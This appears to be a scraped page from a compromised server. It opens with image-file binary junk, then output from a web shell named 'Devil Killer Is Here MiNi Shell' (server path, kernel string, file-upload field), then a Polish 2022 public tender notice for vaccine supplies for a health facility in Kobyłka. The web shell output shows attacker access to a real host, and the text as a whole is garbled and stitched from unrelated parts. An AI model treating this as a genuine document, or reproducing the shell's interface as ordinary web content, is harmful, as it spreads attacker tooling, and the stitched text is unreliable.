JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220712/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220712/0025083201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP ORAZ SUKCESYWNA DOSTAWA SZCZEPIONEK DLA MIEJSKIEGO SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI ZDROWOTNEJ W KOBYŁCE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Samodzielny Publiczny Zakład Opieki Zdrowotnej w Kobyłce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017172050</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żymirskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobyłka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 786 22 44</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mspzoz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mspzoz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP ORAZ SUKCESYWNA DOSTAWA SZCZEPIONEK DLA MIEJSKIEGO SAMODZIELNEGO PUBLICZNEGO ZAKŁADU OPIEKI ZDROWOTNEJ W KOBYŁCE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dcb3d3f6-fdc5-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00250832</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031087/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa szczepionek</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.mspzoz.pl/zam-pub/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bip.mspzoz.pl/zam-pub/przetargi</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,<br/>b) ePUAPu dostępnego pod adresem: /mspzoz/SkrytkaESP<br/>c) poczty elektronicznej: sekretariat@mspzoz.pl.<br/>d) strony internetowej: https://bip.mspzoz.pl/zam-pub/przetargi<br/>2) Zamawiający wyznacza następującą osobę do kontaktu z Wykonawcami: w sprawach związanych z procedurą Pzp: Pani Marlena<br/>Tomaszewska, tel. 509-250-174, e mail: mzakrzewska86@wp.pl<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy :„Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. Dane postępowanie można<br/>wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej<br/>z zakładki Postępowania. UWAGA! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z<br/>Instrukcją korzystania z miniPortalu który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/. Instrukcja została zamieszona<br/>bezpośrednio na stronie https://miniportal.uzp.gov.pl/Instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna Miejskiego Samodzielnego Publicznego Zakładu Opieki Zdrowotnej<br/>w Kobyłce o przetwarzaniu danych dla uczestnikówpostępowania o udzielenie niniejszego zamówienia publicznego, Wykonawców<br/>oraz innych osób,których dane osobowe pozyskano w związku zubieganiem się o udzielenie zamówienia bądź wzwiązku z realizacją<br/>zamówienia przez Wykonawcęzawarta jest w punkcie 24 swz.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/03/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciwko wirusowemu zapaleniu wątroby typu B,(Rdna) zawierająca oczyszczony, antygen powierzchniowy<br/>wirusa zapalenia wątroby typu B (HBsAg), adsorbowany na wodorotlenku glinu do stosowania u osób od 16 roku<br/>życia,umożliwiająca uodpornienie przy zastosowaniu schematu przyspieszonego 0, 7 , 21 dni oraz 12 miesięcy. Fiolka lub<br/>ampułkostrzykawka, opakowania po 1 szt lub 10 szt. Lub 100szt. Liczba zamawianych sztuk na okres zamówienia: 600 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw błonicy, tężcowi, krztuścowi (bezkomórkowa, złożona) poliomyelitis (inaktywowana) i haemophilus typ B (skoniugowana) wskazana do czynnego<br/>uodparniania dzieci od 2 do 36 miesiąca życia – proszek i zawiesina do sporządzania zawiesiny do wstrzykiwań. Ampstrzykawki 0,5 ml z zawiesiną DTPa-IPV+ fiolka z proszkiem HiB<br/>Liczba zamawianych sztuk na okres zamówienia - 100 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw ospie wietrznej, żywa, atenuowana do stosowania od 9 miesiąca życia. Proszek i rozpuszczalnik do<br/>sporządzania roztworu do wstrzykiwań - 0,5 ml. Liczba zamawianych sztuk na okres zamówienia: 50 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span 